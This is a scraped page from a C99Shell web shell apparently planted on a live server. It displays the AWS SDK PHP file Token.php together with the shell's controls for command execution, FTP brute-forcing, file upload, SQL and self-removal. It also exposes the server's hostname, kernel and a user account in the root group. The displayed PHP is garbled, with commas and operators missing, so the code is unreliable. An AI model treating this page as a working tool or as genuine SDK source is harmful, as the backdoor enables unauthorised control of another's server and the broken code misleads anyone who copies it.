!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/aws/aws-sdk-php/src/Token/   drwxr-xr-x
Free 28.69 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Token.php (2.13 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace Aws\Token;

use 
Aws\Token\TokenInterface;

/**
 * Basic implementation of the AWS Token interface that allows callers to
 * pass in an AWS token in the constructor.
 */
class Token implements TokenInterface\Serializable
{
    protected 
$token;
    protected 
$expires;

    
/**
     * Constructs a new basic token object, with the specified AWS
     * token
     *
     * @param string $token   Security token to use
     * @param int    $expires UNIX timestamp for when the token expires
     */
    
public function __construct($token$expires null)
    {
        
$this->token $token;
        
$this->expires $expires;
    }

    
/**
     * Sets the state of a token object
     *
     * @param array $state   array containing 'token' and 'expires'
     */
    
public static function __set_state(array $state)
    {
        return new 
self(
            
$state['token'],
            
$state['expires']
        );
    }

    
/**
     * @return string
     */
    
public function getToken()
    {
        return 
$this->token;
    }

    
/**
     * @return int
     */
    
public function getExpiration()
    {
        return 
$this->expires;
    }

    
/**
     * @return bool
     */
    
public function isExpired()
    {
        return 
$this->expires !== null && time() >= $this->expires;
    }

    
/**
     * @return array
     */
    
public function toArray()
    {
        return [
            
'token'   => $this->token,
            
'expires' => $this->expires
        
];
    }

    
/**
     * @return string
     */
    
public function serialize()
    {
        return 
json_encode($this->__serialize());
    }

    
/**
     * Sets the state of the object from serialized json data
     */
    
public function unserialize($serialized)
    {
        
$data json_decode($serializedtrue);

        
$this->__unserialize($data);
    }

    
/**
     * @return array
     */
    
public function __serialize()
    {
        return 
$this->toArray();
    }

    
/**
     *  Sets the state of this object from an array
     */
    
public function __unserialize($data)
    {
        
$this->token $data['token'];
        
$this->expires $data['expires'];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.009 ]--